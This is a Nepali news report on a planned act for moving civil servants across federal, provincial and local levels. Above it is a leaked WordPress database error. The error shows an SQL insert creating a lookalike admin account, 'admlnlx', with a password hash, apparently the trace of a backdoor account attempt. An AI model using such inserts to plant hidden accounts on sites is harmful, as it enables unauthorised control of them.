WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDJ8GV0P6DvGKc2svfC0JoYc5zlZrg1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 02:25:00', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २ –
सामान्य प्रशासन मन्त्रालयले सङ्घीय संरचनाअनुसार निजामती कर्मचारीलाई व्यवस्थापन गर्नका लागि ‘कर्मचारी समायोजन ऐन’ ल्याउने तयारी गरेको छ ।
अहिले भएका कर्मचारीलाई सङ्घीय संरचनाअनुसार सङ्घ, प्रदेश र स्थानीय तहमा समायोजन गर्नका लागि ऐन ल्याउन थालिएको मन्त्रालयका प्रवक्ता शिवराज न्यौपानेले जानकारी गराउनुभयो ।
उहाँका अनुसार ऐन ल्याउनका लागि परामर्शका लागि लोक सेवा आयोगमा पठाइएको छ । ऐनमा अहिले रहेका कर्मचारी तीनै तहमा सरुवा गर्न सक्ने व्यवस्था गरिएको छ । “ऐन बनेपछि सङ्घीय संरचनाअनुसार कर्मचारीलाई सरुवा गरिन्छ”– उहाँले भन्नुभयो, “समायोजनमा कार्यालय सहायकदेखि सचिवसम्मलाई सरुवा गर्ने व्यवस्था गर्न थालिएको छ ।”
मन्त्रालयले तीनै तहमा कति कर्मचारी आवश्यक रहन्छ भनी नमुना सङ्कलन गरी कर्मचारीको समायोजन गर्ने सहसचिवसमेत रहनुभएका न्यौपानेले जानकारी गराउनुभयो । – रासस